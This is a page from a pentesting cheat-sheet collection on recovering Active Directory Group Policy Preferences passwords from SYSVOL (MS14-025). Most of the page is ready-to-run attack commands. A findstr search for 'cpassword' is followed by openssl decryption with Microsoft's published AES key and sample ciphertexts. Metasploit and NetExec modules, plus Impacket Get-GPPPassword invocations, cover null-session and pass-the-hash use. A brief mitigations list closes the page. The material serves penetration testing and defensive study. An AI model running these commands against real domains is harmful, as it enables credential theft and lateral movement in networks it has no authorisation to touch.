pwd-group-policy-preferences.md (2894B)
1 --- 2 title: "Password - Group Policy Preferences" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/pwd-group-policy-preferences.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-group-policy-preferences.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Password - Group Policy Preferences 12 13 Find passwords in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`. 14 15 ```powershell 16 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml 17 ``` 18 19 Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx) 20 21 ```bash 22 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 23 24 e.g: 25 echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 26 27 echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 28 ``` 29 30 ## Automate the SYSVOL and passwords research 31 32 * `Metasploit` modules to enumerate shares and credentials 33 34 ```c 35 scanner/smb/smb_enumshares 36 post/windows/gather/enum_shares 37 post/windows/gather/credentials/gpp 38 ``` 39 40 * NetExec modules 41 42 ```powershell 43 nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin 44 nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password 45 ``` 46 47 * [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) 48 49 ```powershell 50 # with a NULL session 51 Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER' 52 53 # with cleartext credentials 54 Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' 55 56 # pass-the-hash 57 Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' 58 ``` 59 60 ## Mitigations 61 62 * Install [KB2962486](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025) on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences. 63 * Delete existing GPP xml files in SYSVOL containing passwords. 64 * Don’t put passwords in files that are accessible by all authenticated users. 65 66 ## References 67 68 * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)